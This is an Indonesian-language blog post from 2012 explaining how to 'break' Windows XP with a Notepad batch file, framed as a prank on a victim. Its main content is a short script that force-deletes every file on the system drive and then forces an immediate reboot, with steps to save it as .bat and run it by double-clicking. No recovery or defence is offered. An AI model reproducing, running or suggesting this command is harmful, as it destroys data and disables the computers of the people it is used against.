Cari Blog Ini

Pages

Cara Merusak Windows XP Dengan Notepad

Sabtu, 20 Oktober 2012
Selamat sore sobat, saat ini juga saya akan berbagi tips jitu untuk merusak Operating sistem Berbasis GUI, yaitu Windows XP, ekekekek.....
Saya berbagi tips ini bukan karena ingin membagikan hal yang negatif, namun saya hanya ingin berbagi pengetahuan saja dengan sobat yang sedang membaca artikel ini, yaps saya dapatkan artikel ini dari blog favorite saya, yaitu


 


 
Trik cara merusak windows XP dengan notepad ini, yang disimpan dalam bentuk file.bat ber-encoding ANSI ini memang merepotkan bagi korban yang dijahili, saya juga kurang tau bagaimana cara mengatasi windows XP yang telah dirusak dengan file notepad ber-script ini.

Berikut caranya :

1.Buka Notepad, copy paste script dibawah ini :



@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00



2. Simpan dengan nama berakhiran .bat

File name = .bat
type file = All file
Encoding = ANSI

cukup dengan doubleclick untuk mengeksekusi file ini, dan windows XP- pun akan segera error.

HATI-HATI JANGAN DICOBA DIRUMAH YA.... hehehehehe

0 komentar:

Posting Komentar